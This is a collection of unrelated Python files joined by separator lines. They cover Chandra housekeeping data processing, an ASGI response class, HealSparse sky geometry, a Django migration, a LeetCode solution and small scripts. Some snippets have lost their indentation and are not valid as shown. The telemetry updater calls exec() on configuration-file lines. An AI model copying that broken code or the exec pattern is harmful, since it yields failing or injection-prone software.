    #     sE_w_to_test = np.loadtxt("self_ctow0.dat")
    #     sE_w_to_test_good = np.loadtxt(os.path.join(currentdir, "files/self_ctow_test_good.dat"))
    #     try:
    #         # print("SHAPEs in test_auxiliary = ", sE_w_to_test.shape, " ", sE_w_to_test_good.shape)
    #         arr1 = sE_w_to_test.flatten()
    #         arr2 = sE_w_to_test_good.flatten()
    #         for i in range(arr1.shape[0]):
    #             if abs(arr1[i]) > 10**-2.0:
    #                 tmp = abs(arr1[i] - arr2[i])/abs(arr1[i])
    #                 if tmp > 10**-2.0:
    #                     print(tmp)
    #         test_tools.compare_arrays(sE_w_to_test, sE_w_to_test_good, rprecision=10**-2, n_diff_max=10, zero_equivalent=10**-2)
    #         #np.testing.assert_allclose(sE_w_to_test, sE_w_to_test_good, rtol=1e-3)
    #     except AssertionError:
    #         self.fail("Ayaya, np.allclose failed at test_get_sE_w")
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# update_dea_rdb.py: update DS deahk realated rdb files #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 04, 2021 #
# #
#############################################################################################
import os
import sys
import re
import string
import random
import operator
import math
import numpy
import time
import subprocess
import Chandra.Time
import unittest
#
#--- set environment for "getnrt"
#
from Ska.Shell import getenv, bash
ascdsenv = getenv('source /home/ascds/.ascrc -r release; source /home/mta/bin/reset_param', shell='tcsh')
ascdsenv['IPCL_DIR'] = "/home/ascds/DS.release/config/tp_template/P011/"
ascdsenv['ACORN_GUI'] = "/home/ascds/DS.release/config/mta/acorn/scripts/"
ascdsenv['LD_LIBRARY_PATH'] = "/home/ascds/DS.release/lib:/home/ascds/DS.release/ots/lib:/soft/SYBASE_OSRV15.5/OCS-15_0/lib:/home/ascds/DS.release/otslib:/opt/X11R6/lib:/usr/lib64/alliance/lib"
ascdsenv['ACISTOOLSDIR'] = "/data/mta/Script/Dumps/Scripts"
#
#--- read directory list
#
# Read the house_keeping dir_list file: each line is "<value> : <name>", and
# each pair is bound as a module-level variable (e.g. ds_dir, bin_dir, mta_dir).
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    # SECURITY NOTE: exec() on file contents — dir_list must remain a trusted,
    # locally controlled file.
    exec("%s = %s" %(var, line))
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time()*random.random())
zspace = '/tmp/zspace' + str(rtail)
# averaging window in seconds used by time_average()
resolution = 300
#
#NOTE: this is a replacement for the old perl scripts: out2in.pl average.pl prep.perl
#
#-----------------------------------------------------------------------------------------------
#-- update_dea_rdb: update DS deahk realated rdb files --
#-----------------------------------------------------------------------------------------------
def update_dea_rdb():
    """
    update DS deahk related rdb files
    input:  none but read from: <house_keeping>/today_dump_files
    output: <ds_dir>/deahk_temp <ds_dir>/deahk_elec
    """
#
#--- make backup first
#
    cmd = 'cp ' + ds_dir + 'deahk_temp.rdb ' + ds_dir + 'deahk_temp.rdb~'
    os.system(cmd)
    cmd = 'cp ' + ds_dir + 'deahk_elec.rdb ' + ds_dir + 'deahk_elec.rdb~'
    os.system(cmd)
#
#--- read today's dump list
#
    dfile = house_keeping + 'today_dump_files'
    data  = mcf.read_data_file(dfile)
    for ent in data:
        ifile = '/dsops/GOT/input/' + ent + '.gz'
#
#--- run Peter Ford's scripts and pipe into deakh.py
#--- (PERL5LIB is cleared so the system perl does not pick up stale modules)
#
        cmd1 = "/usr/bin/env PERL5LIB='' "
        #cmd2 = '/bin/gzip -dc ' + ifile + '|' + bin_dir + 'getnrt -O | ' + bin_dir + 'deahk.py'
        cmd2 = '/bin/gzip -dc ' + ifile + '|' + bin_dir + 'getnrt -O | ' + bin_dir + 'deahk.pl'
        cmd  = cmd1 + cmd2
        bash(cmd, env=ascdsenv)
        # deahk.pl drops its results in the current directory; fold each
        # product into the matching rdb file when present.
        if os.path.isfile('./deahk_temp.tmp'):
            process_deahk('deahk_temp')
        if os.path.isfile('./deahk_elec.tmp'):
            process_deahk('deahk_elec')
#-----------------------------------------------------------------------------------------------
#-- process_deahk: process deahk data to match dataseeker data format --
#-----------------------------------------------------------------------------------------------
def process_deahk(dtype):
    """
    Convert a freshly dumped deahk file into dataseeker rdb format and append it.

    input:  dtype --- data type; either 'deahk_temp' or 'deahk_elec';
                      the input file is expected at ./<dtype>.tmp
    output: <ds_dir>/<dtype>.rdb (appended to)
    """
    raw = mcf.read_data_file(dtype + '.tmp', remove=1)
    # Convert the time column to seconds from 1998.1.1, then bin/average
    # at the module-level <resolution>.
    binned = time_average(convert_time_format(raw))
    # Each averaged entry is written followed by a newline, as before.
    payload = ''.join(entry + '\n' for entry in binned)
    with open(ds_dir + dtype + '.rdb', 'a') as fo:
        fo.write(payload)
#-----------------------------------------------------------------------------------------------
#-- convert_time_format: convert time format from <yyyy>:<ddd>:<hh>:<mm>:<ss> to Chandra time --
#-----------------------------------------------------------------------------------------------
def convert_time_format(data):
    """
    convert time format from <ddd>:<seconds-of-day> to Chandra time (secs from 1998.1.1)
    we assume that the second entry of each line is the time
    input:  data --- a list of data lines
    output: save --- a list of data lines with the converted time format
    """
#
#--- find today's year and ydate
#
    out   = time.strftime("%Y:%j", time.gmtime())
    atemp = re.split(':', out)
    year  = int(float(atemp[0]))
    yday  = int(float(atemp[1]))
    save  = []
    for ent in data:
        atemp = re.split('\s+', ent)
        date  = atemp[1]
        btemp = re.split(':', date)
        ydate = int(btemp[0])
        ytime = float(btemp[1])
        uyear = year
#
#--- if today's ydate is in the first part of the year, it is possible that
#--- the data are from the last year; make sure the corresponding year is correct.
#
        if yday < 10:
            if ydate > 350:
                uyear = year -1
        sydate = mcf.add_leading_zero(ydate, dlen=3)
        # seconds-of-day -> fraction of day -> hh:mm:ss components
        ytime /= 86400.0
        hp  = ytime * 24
        hh  = int(hp)
        lhh = mcf.add_leading_zero(hh)
        mp  = (hp - hh) * 60
        mm  = int(mp)
        lmm = mcf.add_leading_zero(mm)
        ss  = int((mp - mm) * 60)
        lss = mcf.add_leading_zero(ss)
        stime = str(uyear) + ':' + str(sydate) + ':' + str(lhh) + ':' + str(lmm) + ':' + str(lss)
        try:
            ctime = Chandra.Time.DateTime(stime).secs
        except:
            # unparsable timestamp: drop the line rather than abort the run
            continue
        out = ent.replace(date, str(ctime))
        save.append(out)
    return save
#-----------------------------------------------------------------------------------------------
#-- time_average: compute avg and std for the data for a given resolution --
#-----------------------------------------------------------------------------------------------
def time_average(data):
    """
    compute avg and std for the data for a given resolution (module-level, seconds)
    input:  data  --- a list of data lines (time in the second column)
    output: mdata --- a list of formatted output lines:
                      <avg time> <count> then <avg> <std> per data column
    """
    cdata = mcf.separate_data_into_col_data(data)
    clen  = len(cdata)
    dlen  = len(cdata[1])
    # per-column accumulators for the current time bin
    save  = []
    for k in range(0, clen):
        save.append([])
#
#--- time is kept in the second column
#
    t_list = cdata[1]
    tlast  = t_list[0]
    mdata  = []
    for m in range(0, dlen):
        # still inside the current bin: accumulate every column
        if t_list[m] - tlast <= resolution:
            for k in range(0, clen):
                save[k].append(cdata[k][m])
        else:
            ncnt = len(save[1])
            if ncnt < 1:
                # empty bin: restart accumulation from the current row
                for k in range(0, clen):
                    save[k] = [cdata[k][m]]
                tlast = t_list[m]
                continue
            else:
                try:
                    atime = numpy.mean(save[1])
                except:
                    # fall back to the middle sample's time
                    atime = save[1][int(0.5*ncnt)]
                # NOTE(review): this uses "%10e" while the leftover branch
                # below uses "%8e" — confirm whether the widths should match.
                line = "%10e\t%d" % (atime, ncnt)
#
#--- dea data starts from third column
#
                for k in range(2, clen):
                    try:
                        avg = numpy.mean(save[k])
                        std = numpy.std(save[k])
                    except:
                        avg = 0.0
                        std = 0.0
                    line = line + "\t%.4f\t%.5f" % (avg, std)
                line = line + '\n'
                mdata.append(line)
                # start the next bin with the current row
                for k in range(0, clen):
                    save[k] = [cdata[k][m]]
                tlast = t_list[m]
#
#--- compute left over
#
    if len(save[1]) > 0:
        try:
            atime = numpy.mean(save[1])
        except:
            try:
                atime = save[1][0]
            except:
                atime = 0.0
        ncnt = len(save[1])
        line = "%8e\t%d" % (atime, ncnt)
        for k in range(2, clen):
            try:
                avg = numpy.mean(save[k])
                std = numpy.std(save[k])
            except:
                avg = 0.0
                std = 0.0
            line = line + "\t%.4f\t%.5f" % (avg, std)
        line = line + '\n'
        mdata.append(line)
    return mdata
#-----------------------------------------------------------------------------------------------
if __name__ == "__main__":
update_dea_rdb()
|
"""
response schema
"""
import json
import typing
import jinja2
try:
from aiofile import AIOFile
except ImportError:
AIOFile = None
from kumquat._types import Scope, Receive, Send
from kumquat.context import env_var
try:
import ujson
except ImportError:
ujson = None
JSON = json if ujson is None else ujson
class SimpleResponse:
    """
    Base kumquat response.

    Awaitable ASGI application: sends an ``http.response.start`` message
    (status + headers) followed by an ``http.response.body`` message.
    """

    charset = "utf-8"
    content_type = "text/plain"

    def __init__(
        self,
        body: typing.Any,
        headers: typing.List[typing.Dict[str, str]] = None,
        status_code: int = 200,
    ):
        # body may be str, bytes, or dict (JSON-serialized in parse_body)
        self.body = body
        self._status_code = status_code
        self._custom_headers = headers

    async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
        """Send this response over the ASGI `send` channel."""
        await send(
            {
                "type": "http.response.start",
                "status": self.status_code,
                "headers": self._create_headers(),
            }
        )
        await send({"type": "http.response.body", "body": self.parse_body()})

    @property
    def custom_headers(self) -> typing.Optional[typing.List[typing.Dict[str, str]]]:
        """
        headers property for response
        :return:
        """
        return self._custom_headers

    @custom_headers.setter
    def custom_headers(self, value):
        self._custom_headers = value

    @property
    def status_code(self) -> int:
        """
        status code property for response
        :return:
        """
        return self._status_code

    @status_code.setter
    def status_code(self, value):
        self._status_code = value

    def _create_headers(self) -> typing.List[typing.List[bytes]]:
        """
        Build the ASGI header list ([name, value] pairs of encoded bytes).

        BUG FIX: the original appended only the *last* key/value pair of
        each custom-header dict (the append sat outside the inner loop);
        every pair is now emitted.
        """
        body = self.parse_body()  # encode once; used only for content-length here
        _headers = [
            [b"content-length", str(len(body)).encode(self.charset)],
            [
                b"content-type",
                f"{self.content_type}; charset={self.charset}".encode(self.charset),
            ],
        ]
        if self.custom_headers is not None:
            for header in self.custom_headers:
                for key, value in header.items():
                    _headers.append(
                        [key.encode(self.charset), value.encode(self.charset)]
                    )
        return _headers

    def set_headers(self, headers: typing.Dict[str, str]) -> None:
        """
        set headers for response
        :param headers: dict of header name -> value
        :return:
        """
        if self.custom_headers is None:
            self.custom_headers = []
        self.custom_headers.append(headers)

    def parse_body(self) -> bytes:
        """
        encode response body to bytes (dicts are serialized with ujson/json)
        :return:
        """
        if isinstance(self.body, bytes):
            return self.body
        if isinstance(self.body, dict):
            return JSON.dumps(self.body).encode(self.charset)
        return self.body.encode(self.charset)
class TextResponse(SimpleResponse):
    """Plain-text response (Content-Type: text/plain)."""

    content_type = "text/plain"
class HTMLResponse(SimpleResponse):
    """HTML response (Content-Type: text/html)."""

    content_type = "text/html"
class JsonResponse(SimpleResponse):
    """JSON response (Content-Type: application/json)."""

    content_type = "application/json"
class TemplateResponse(SimpleResponse):
    """
    response for rendering templates

    Renders a jinja2 template file (path resolved against the env_var
    context variable) with the given keyword arguments as template data.
    Uses aiofile for non-blocking reads when available.
    """
    content_type = "text/html"
    def __init__(self, template: str, **kwargs):
        # body starts empty; it is filled by _render_template on __call__
        super().__init__(b"")
        self.template = template
        self.template_data = kwargs
    async def _render_template(self) -> str:
        # "/" means "no prefix" for path construction below
        if env_var.get() == "/":
            env_var.set("")
        if AIOFile is None:
            # aiofile not installed: fall back to a blocking read
            with open(f"{env_var.get()}{self.template}", "r", encoding="utf-8") as file:
                template = jinja2.Template(file.read())
        else:
            async with AIOFile(
                f"{env_var.get()}{self.template}", "r", encoding="utf-8"
            ) as file:
                template = jinja2.Template(await file.read())
        return template.render(self.template_data)
    async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
        # render lazily at send time, then delegate to the base response
        self.body = await self._render_template()
        await super().__call__(scope, receive, send)
|
# !/bin/python3
"""Inject node keys from config.json into the node property files and
point the REST config at the local docker network addresses."""
import json
import sys
import re

with open('./config.json', 'r') as f:
    data = json.load(f)
harvester_key = data["harvesterKey"]
harvester_vrf = data["harvesterVrfKey"]
node_name = data["nodeName"]

# Each entry: the property prefix to look for, the new value, the file to patch.
params_to_replace = [
    {"name": "harvesterSigningPrivateKey =", "param": harvester_key,
     "file": "core-node/config/resources/config-harvesting.properties"},
    {"name": "harvesterVrfPrivateKey =", "param": harvester_vrf,
     "file": "core-node/config/resources/config-harvesting.properties"},
    {"name": "friendlyName =", "param": node_name,
     "file": "core-node/config/resources/config-node.properties"}]

for param in params_to_replace:
    # Read the file, replace the value that follows the property prefix,
    # and write the result back. Context managers guarantee the handles
    # are closed even if the substitution fails. (The original also built
    # an unused `new_param` string and left file handles to manual close.)
    with open(param["file"], 'r') as f:
        filedata = f.read()
    # re.escape keeps the fixed-width lookbehind literal even if a prefix
    # ever contains regex metacharacters.
    newdata = re.sub(
        r'(?<={})[^\n\s]*'.format(re.escape(param["name"])), param["param"], filedata)
    print(newdata)
    with open(param["file"], 'w') as f:
        f.write(newdata)

with open('rest/rest.json', 'r') as f:
    data = json.load(f)
# other rest options here
data["db"]["url"] = "mongodb://172.28.1.2:27017/"
data["apiNode"]["host"] = "172.28.1.1"
with open('rest/rest.json', 'w') as jsonfile:
    json.dump(data, jsonfile, indent=4)
|
import torch
import pandas as pd
import numpy as np
import os
from pathlib import Path
import numpy as np
import os
# Fix all RNG seeds so the generated fixture is reproducible run to run.
np.random.seed(123)
os.environ["PYTHONHASHSEED"] = str(123)
torch.manual_seed(123)
# Scale of the uniform random features (raw values drawn in [0, VAL)).
VAL = 100
def get_sum_with_max_contribution_per_value(tensor: torch.Tensor, val=None):
    """Sum a 1-D tensor, clamping each element's contribution to +/- val/2.

    :param tensor: 1-D tensor of values to sum
    :param val: scale constant; defaults to the module-level ``VAL``
        (parameter added so the cap is no longer hard-wired to the global)
    :return: sum with every element clamped to ``[-val/2, val/2]``
    """
    if val is None:
        val = VAL
    cap = 0.5 * val
    # min/max clamp replaces the original pair of conditional expressions.
    return sum(min(max(value, -cap), cap) for value in tensor.tolist())
# Draw uniform features in [0, VAL) and shift them to be centered on zero,
# i.e. values in [-VAL/2, VAL/2).
initial_random_data = torch.rand(50000, 4) * VAL
initial_sum_to_1 = initial_random_data - (0.5 * VAL)
# A positive target is one where the sum is over 0.5, and a single value cannot contribute more than 0.5 towards the sum.
targets = torch.tensor(
    [
        1 if get_sum_with_max_contribution_per_value(tensor) > (0.5 * VAL) else 0
        for tensor in initial_sum_to_1
    ]
)
print("Generated fake data, amount of true targets: ", torch.count_nonzero(targets))
# Create names for columns and insert into csv.
column_names = [f"X_{num}" for num in range(initial_sum_to_1.size()[1])]
df = pd.DataFrame(initial_sum_to_1.numpy(), columns=column_names)
df.insert(0, "Targets", targets)
# Insert locked features
# NOTE(review): torch.zeros(50000, 1).numpy() is 2-D; pandas accepts it here,
# but a 1-D array (torch.zeros(50000)) would be the conventional column shape.
df.insert(len(df.values[0]), "X_4", torch.zeros(50000, 1).numpy())
df.insert(len(df.values[0]), "X_5", torch.zeros(50000, 1).numpy())
# Save CSV
# Write the fixture next to this script so relative runs are reproducible.
dataDir = Path(__file__).parent.absolute()
df.to_csv(f"{dataDir}/fake_data.csv", index=False)
|
import numpy as np
import hpgeom as hpg
from .healSparseMap import HealSparseMap
from .utils import is_integer_value
import numbers
def realize_geom(geom, smap, type='or'):
    """
    Realize geometry objects in a map.

    Parameters
    ----------
    geom : Geometric primitive or list thereof
        List of Geom objects, e.g. Circle, Polygon
    smap : `HealSparseMap`
        The map in which to realize the objects.
    type : `str`
        Way to combine the list of geometric objects. Default
        is to "or" them.

    Raises
    ------
    ValueError
        If ``type`` is not 'or', if ``smap`` is not an integer map, or if
        a geometry value is incompatible with the map (non-integer, out of
        dtype range, or wide-mask bits into a non-wide-mask map).
    """
    if type != 'or':
        raise ValueError('type of composition must be or')
    if not smap.is_integer_map:
        raise ValueError('can only or geometry objects into an integer map')
    if not isinstance(geom, (list, tuple)):
        geom = [geom]
    # split the geom objects up by value
    gdict = {}
    for g in geom:
        value = g.value
        if isinstance(value, (tuple, list, np.ndarray)):
            # Sequences are converted to tuples so they can be dict keys.
            value = tuple(value)
            # This is a wide mask
            if not smap.is_wide_mask_map:
                raise ValueError("Can only use wide bit geometry values in a wide mask map")
            for v in value:
                _check_int(v)
        else:
            _check_int(value)
            _check_int_size(value, smap.dtype)
        if value not in gdict:
            gdict[value] = [g]
        else:
            gdict[value].append(g)
    # deal with each value separately and add to
    # the map
    for value, glist in gdict.items():
        # Accumulate the pixel lists of all objects sharing this value.
        for i, g in enumerate(glist):
            tpixels = g.get_pixels(nside=smap.nside_sparse)
            if i == 0:
                pixels = tpixels
            else:
                oldsize = pixels.size
                newsize = oldsize + tpixels.size
                # need refcheck=False because it will fail when running
                # the python profiler; I infer that the profiler holds
                # a reference to the objects
                pixels.resize(newsize, refcheck=False)
                pixels[oldsize:] = tpixels
        # Deduplicate so each pixel is or-ed exactly once.
        pixels = np.unique(pixels)
        if smap.is_wide_mask_map:
            smap.set_bits_pix(pixels, value)
        else:
            values = smap.get_values_pix(pixels)
            values |= value
            smap.update_values_pix(pixels, values)
def _check_int(x):
check = isinstance(x, numbers.Integral)
if not check:
raise ValueError('value must be integer type, '
'got %s' % x)
def _check_int_size(value, dtype):
ii = np.iinfo(dtype)
if value < ii.min or value > ii.max:
raise ValueError('value %d outside range [%d, %d]' %
(value, ii.min, ii.max))
class GeomBase(object):
    """
    Base class for geometric objects that can convert
    themselves to maps.
    """
    @property
    def is_integer_value(self):
        """
        Check if the value is an integer type
        """
        return is_integer_value(self._value)
    @property
    def value(self):
        """
        Get the value to be used for all pixels in the map.
        """
        return self._value
    def get_pixels(self, *, nside):
        """
        Get pixels for this geometric shape.

        Parameters
        ----------
        nside : `int`
            HEALPix nside for the pixels.

        Raises
        ------
        NotImplementedError
            Always, in the base class; subclasses must override.
        """
        raise NotImplementedError('Implement get_pixels')
    def get_map(self, *, nside_coverage, nside_sparse, dtype, wide_mask_maxbits=None):
        """
        Get a healsparse map corresponding to this geometric primitive.

        Parameters
        ----------
        nside_coverage : `int`
            nside of coverage map
        nside_sparse : `int`
            nside of sparse map
        dtype : `np.dtype`
            dtype of the output array
        wide_mask_maxbits : `int`, optional
            Create a "wide bit mask" map, with this many bits.

        Returns
        -------
        hsmap : `healsparse.HealSparseMap`
        """
        # Choose the sentinel from the dtype: 0 for integer maps,
        # UNSEEN for floating-point maps.
        x = np.zeros(1, dtype=dtype)
        if is_integer_value(x[0]):
            sentinel = 0
        else:
            sentinel = hpg.UNSEEN
        if isinstance(self._value, (tuple, list, np.ndarray)):
            # This is a wide mask
            if wide_mask_maxbits is None:
                # Default the bit width to the highest bit requested.
                wide_mask_maxbits = np.max(self._value)
            else:
                if wide_mask_maxbits < np.max(self._value):
                    raise ValueError("wide_mask_maxbits (%d) is less than maximum bit value (%d)" %
                                     (wide_mask_maxbits, np.max(self._value)))
        smap = HealSparseMap.make_empty(
            nside_coverage=nside_coverage,
            nside_sparse=nside_sparse,
            dtype=dtype,
            sentinel=sentinel,
            wide_mask_maxbits=wide_mask_maxbits
        )
        pixels = self.get_pixels(nside=nside_sparse)
        if wide_mask_maxbits is None:
            # This is a regular set
            smap.update_values_pix(pixels, np.array([self._value], dtype=dtype))
        else:
            # This is a wide mask
            smap.set_bits_pix(pixels, self._value)
        return smap
    def get_map_like(self, sparseMap):
        """
        Get a healsparse map corresponding to this geometric primitive,
        with the same parameters as an input sparseMap.

        Parameters
        ----------
        sparseMap : `healsparse.HealSparseMap`
            Input map to match parameters

        Returns
        -------
        hsmap : `healsparse.HealSparseMap`

        Raises
        ------
        RuntimeError
            If ``sparseMap`` is not a HealSparseMap or is a rec array map.
        """
        if not isinstance(sparseMap, HealSparseMap):
            raise RuntimeError("Input sparseMap must be a HealSparseMap")
        if sparseMap.is_rec_array:
            raise RuntimeError("Input SparseMap cannot be a rec array")
        if sparseMap.is_wide_mask_map:
            wide_mask_maxbits = sparseMap.wide_mask_maxbits
        else:
            wide_mask_maxbits = None
        return self.get_map(nside_coverage=sparseMap.nside_coverage,
                            nside_sparse=sparseMap.nside_sparse,
                            dtype=sparseMap.dtype, wide_mask_maxbits=wide_mask_maxbits)
class Circle(GeomBase):
    """
    A circular region on the sky.

    Parameters
    ----------
    ra : `float`
        RA in degrees (scalar-only).
    dec : `float`
        Declination in degrees (scalar-only).
    radius : `float`
        Radius in degrees (scalar-only).
    value : number
        Value for pixels in the map (scalar or list of bits for `wide_mask`)
    """
    def __init__(self, *, ra, dec, radius, value):
        if not (np.isscalar(ra) and np.isscalar(dec) and np.isscalar(radius)):
            raise ValueError('Circle only accepts scalar inputs for ra, dec, and radius')
        self._ra = ra
        self._dec = dec
        self._radius = radius
        self._value = value
    @property
    def ra(self):
        """RA of the circle center in degrees."""
        return self._ra
    @property
    def dec(self):
        """Declination of the circle center in degrees."""
        return self._dec
    @property
    def radius(self):
        """Radius of the circle in degrees."""
        return self._radius
    def get_pixels(self, *, nside):
        """Return nest-ordered pixels covered by this circle at ``nside``."""
        pixels = hpg.query_circle(
            nside,
            self._ra,
            self._dec,
            self._radius,
            nest=True,
            inclusive=False,
        )
        return pixels
    def __repr__(self):
        template = 'Circle(ra=%.16g, dec=%.16g, radius=%.16g, value=%s)'
        return template % (self._ra, self._dec, self._radius, repr(self._value))
class Polygon(GeomBase):
    """
    A polygonal region on the sky.

    Vertices may be listed in either clockwise or counter-clockwise order.

    Parameters
    ----------
    ra : `np.ndarray` (nvert,)
        RA of vertices in degrees.
    dec : `np.ndarray` (nvert,)
        Declination of vertices in degrees.
    value : number
        Value for pixels in the map
    """
    def __init__(self, *, ra, dec, value):
        ra_arr = np.array(ra, ndmin=1)
        dec_arr = np.array(dec, ndmin=1)
        if ra_arr.size != dec_arr.size:
            raise ValueError('ra/dec are different sizes')
        if ra_arr.size < 3:
            raise ValueError('A polygon must have at least 3 vertices')
        self._ra = ra_arr
        self._dec = dec_arr
        # Precompute the unit-vector form once; consumers may want it directly.
        self._vertices = hpg.angle_to_vector(ra_arr, dec_arr, lonlat=True)
        self._value = value
        self._is_integer = is_integer_value(value)
    @property
    def ra(self):
        """RA of the vertices in degrees."""
        return self._ra
    @property
    def dec(self):
        """Declination of the vertices in degrees."""
        return self._dec
    @property
    def vertices(self):
        """Vertices in unit-vector form."""
        return self._vertices
    def get_pixels(self, *, nside):
        """Return nest-ordered pixels covered by this polygon at ``nside``."""
        return hpg.query_polygon(
            nside,
            self._ra,
            self._dec,
            nest=True,
            inclusive=False,
        )
    def __repr__(self):
        template = 'Polygon(ra=%s, dec=%s, value=%s)'
        return template % (repr(self._ra), repr(self._dec), repr(self._value))
class Ellipse(GeomBase):
    """
    Create an ellipse.

    Parameters
    ----------
    ra : `float`
        ra in degrees (scalar only)
    dec : `float`
        dec in degrees (scalar only)
    semi_major : `float`
        The semi-major axis of the ellipse in degrees.
    semi_minor : `float`
        The semi-minor axis of the ellipse in degrees.
    alpha : `float`
        Inclination angle, counterclockwise with respect to North (degrees).
    value : number
        Value for pixels in the map (scalar or list of bits for `wide_mask`).
    """
    def __init__(self, *, ra, dec, semi_major, semi_minor, alpha, value):
        self._ra = ra
        self._dec = dec
        self._semi_major = semi_major
        self._semi_minor = semi_minor
        self._alpha = alpha
        self._value = value
        sc_ra = np.isscalar(self._ra)
        sc_dec = np.isscalar(self._dec)
        sc_semi_major = np.isscalar(self._semi_major)
        sc_semi_minor = np.isscalar(self._semi_minor)
        sc_alpha = np.isscalar(self._alpha)
        if not sc_ra or not sc_dec or not sc_semi_major or not sc_semi_minor or not sc_alpha:
            raise ValueError(
                'Ellipse only accepts scalar inputs for ra, dec, semi_major, semi_minor, and alpha.'
            )
    @property
    def ra(self):
        """RA of the ellipse center in degrees."""
        return self._ra
    @property
    def dec(self):
        """Declination of the ellipse center in degrees."""
        return self._dec
    @property
    def semi_major(self):
        """Semi-major axis in degrees."""
        return self._semi_major
    @property
    def semi_minor(self):
        """Semi-minor axis in degrees."""
        return self._semi_minor
    @property
    def alpha(self):
        """Inclination angle in degrees."""
        return self._alpha
    def get_pixels(self, *, nside):
        """Return nest-ordered pixels covered by this ellipse at ``nside``."""
        return hpg.query_ellipse(
            nside,
            self._ra,
            self._dec,
            self._semi_major,
            self._semi_minor,
            self._alpha,
            nest=True,
            inclusive=False
        )
    def __repr__(self):
        # Bug fix: the original format used '%16g' (field width 16) instead of
        # '%.16g' (precision 16) for every field after ra, which space-padded
        # values and dropped precision; now consistent with Circle.__repr__.
        s = 'Ellipse(ra=%.16g, dec=%.16g, semi_major=%.16g, semi_minor=%.16g, alpha=%.16g, value=%s)'
        return s % (self._ra, self._dec, self._semi_major, self._semi_minor, self._alpha, repr(self._value))
|
# Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
@dataclass
class NodeConnection:
    """Connection details for a single blockchain node endpoint."""

    chain: str
    url: str
    poa: bool

    def __repr__(self) -> str:
        return "<Chain: {}, Node: {}, Poa: {}>".format(self.chain, self.url, self.poa)

    def __iter__(self):
        # Yield (field, value) pairs so dict(instance) round-trips the fields.
        yield from self.__dict__.items()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-08 15:34
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 1.11): redefines Election.group as a nullable
    # self-referential FK with reverse accessor "_children_qs".
    dependencies = [("elections", "0052_auto_20181005_1645")]
    operations = [
        migrations.AlterField(
            model_name="election",
            name="group",
            field=models.ForeignKey(
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name="_children_qs",
                to="elections.Election",
            ),
        )
    ]
|
'''
Given two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. In other words, one of the first string's permutations is the substring of the second string.
Example 1:
Input:s1 = "ab" s2 = "eidbaooo"
Output:True
Explanation: s2 contains one permutation of s1 ("ba").
Example 2:
Input:s1= "ab" s2 = "eidboaoo"
Output: False
Note:
The input strings only contain lower case letters.
The length of both given strings is in range [1, 10,000].
'''
class Solution:
    def checkInclusion(self, s1, s2):
        """
        Return True if some permutation of s1 occurs as a substring of s2.

        Slides a character-count window of width len(s1) across s2 and
        compares it against the character counts of s1.

        :type s1: str
        :type s2: str
        :rtype: bool
        """
        # Local import fixes the original module-level bug: `collections`
        # was never imported, so every call raised NameError.
        from collections import Counter

        if not s1:
            return True
        if len(s2) < len(s1):
            return False
        s1_counter = Counter(s1)
        s2_counter = Counter(s2[:len(s1)])
        if s1_counter == s2_counter:
            return True
        for i in range(1, len(s2) - len(s1) + 1):
            # Slide right by one: count the entering char, drop the leaving one.
            s2_counter.update(s2[i + len(s1) - 1])
            s2_counter -= Counter(s2[i - 1])
            if s1_counter == s2_counter:
                return True
        return False
|
import window.player
import svecova.player
#import svecova.player03
import sebastian.player
import martins.player
import lionel.player
import janmrzilek.player
import benda.player
import vrba.player
from gomoku_tournament import GomokuTournament
# Pick the two competitors for this match (player symbols: 1 = X, -1 = O).
playerX = svecova.player.Player(1)
playerO = benda.player.Player(-1)
# NOTE(review): 300 is presumably a per-game limit (seconds or moves) --
# confirm against the GomokuTournament constructor.
tournament = GomokuTournament(playerX, playerO, 300)
winner = tournament.game()
tournament.save_logs()
print(f'winner is {winner}')
|
import serial

# Open COM1 at 9600 baud, 8 data bits, no parity, 1 stop bit (8N1).
ser = serial.Serial('COM1', baudrate=9600, bytesize=8, parity='N', stopbits=1)
ser.write(b'G1 X5 Y50 \r\n')
# Bug fix: readline() is a method of the open port object, not of the
# `serial` module -- the original `serial.readline()` raised AttributeError.
resp = ser.readline()
|
# District codes and their populations (formatted strings), index-aligned.
items = ('st','BD','BTL','CG','DD','HBT')
a = 'thứ tự các quận trong thành phố:'
print(a,*items,sep=',')
number = ('150,300','247,100','333,300','266,800','420,900','318,000')
b = 'số dân theo thứ tự các quận:'
print(b,*number,sep=';')
# Derive the smallest/biggest districts from the data instead of the
# original hard-coded 'st'/'DD' answers (which would silently go stale
# if the population figures changed).
populations = [int(n.replace(',', '')) for n in number]
smallest_index = populations.index(min(populations))
biggest_index = populations.index(max(populations))
smallest = items[smallest_index]
c = 'quận có số dân ít nhất:'
print(*c,*smallest,sep='')
print(number[smallest_index])
biggest = items[biggest_index]
c = 'quận có số dân nhiều nhất:'
print(*c,*biggest,sep='')
print(number[biggest_index])
|
def myGenFunc():
    """Yield the integers 2, 3 and 4, one per resumption."""
    for current in (2, 3, 4):
        yield current
# Consume the generator: each next() resumes the function at its last yield.
generator = myGenFunc()
for _ in range(3):
    print(next(generator))
|
#! usr/bin/env python
# -*-coding:utf-8-*-
# author:yanwenming
# date:2020-06-30
import unittest
from page.init import *
import requests
import time as t
import os
import sys
from bs4 import BeautifulSoup
from lxml import etree
# Make the project root importable when this file runs as a script.
curPath = os.path.abspath ( os.path.dirname ( __file__ ) )
